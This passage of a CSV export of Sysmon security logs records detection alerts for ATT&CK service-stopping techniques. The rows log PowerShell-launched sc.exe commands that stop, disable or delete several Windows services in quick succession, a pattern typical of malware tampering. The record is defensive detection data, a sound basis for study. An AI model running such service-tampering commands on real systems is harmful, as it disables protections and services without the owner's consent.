+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.020347700Z"",""eventRecordID"":""2318"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.011\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00102ece1d00}\r\nProcessId: 2280\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.011"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00102ece1d00}"",""processId"":""2280"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.960 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-00102bcb1d00} +ProcessId: 4200 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.964921900Z"",""eventRecordID"":""2315"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.960\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00102bcb1d00}\r\nProcessId: 4200\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager 
Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.960"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00102bcb1d00}"",""processId"":""4200"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.215",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.945 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-001046ca1d00} +ProcessId: 7328 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config \gm Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.950478900Z"",""eventRecordID"":""2314"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.945\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-001046ca1d00}\r\nProcessId: 7328\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.945"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-001046ca1d00}"",""processId"":""7328"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\\gm Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.167",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.918 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010b0c81d00} +ProcessId: 6560 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.921110600Z"",""eventRecordID"":""2312"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.918\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010b0c81d00}\r\nProcessId: 6560\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:59.918"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010b0c81d00}"",""processId"":""6560"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.104",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.877 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-00102ec61d00} +ProcessId: 7068 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.879926800Z"",""eventRecordID"":""2308"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.877\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00102ec61d00}\r\nProcessId: 7068\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.877"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00102ec61d00}"",""processId"":""7068"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.077",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.848 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-00109fc41d00} +ProcessId: 1344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Oracleupdate 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.850440700Z"",""eventRecordID"":""2306"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.848\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00109fc41d00}\r\nProcessId: 1344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.848"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00109fc41d00}"",""processId"":""1344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.061",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.648 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010d1c11d00} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.649844200Z"",""eventRecordID"":""2305"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.648\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010d1c11d00}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 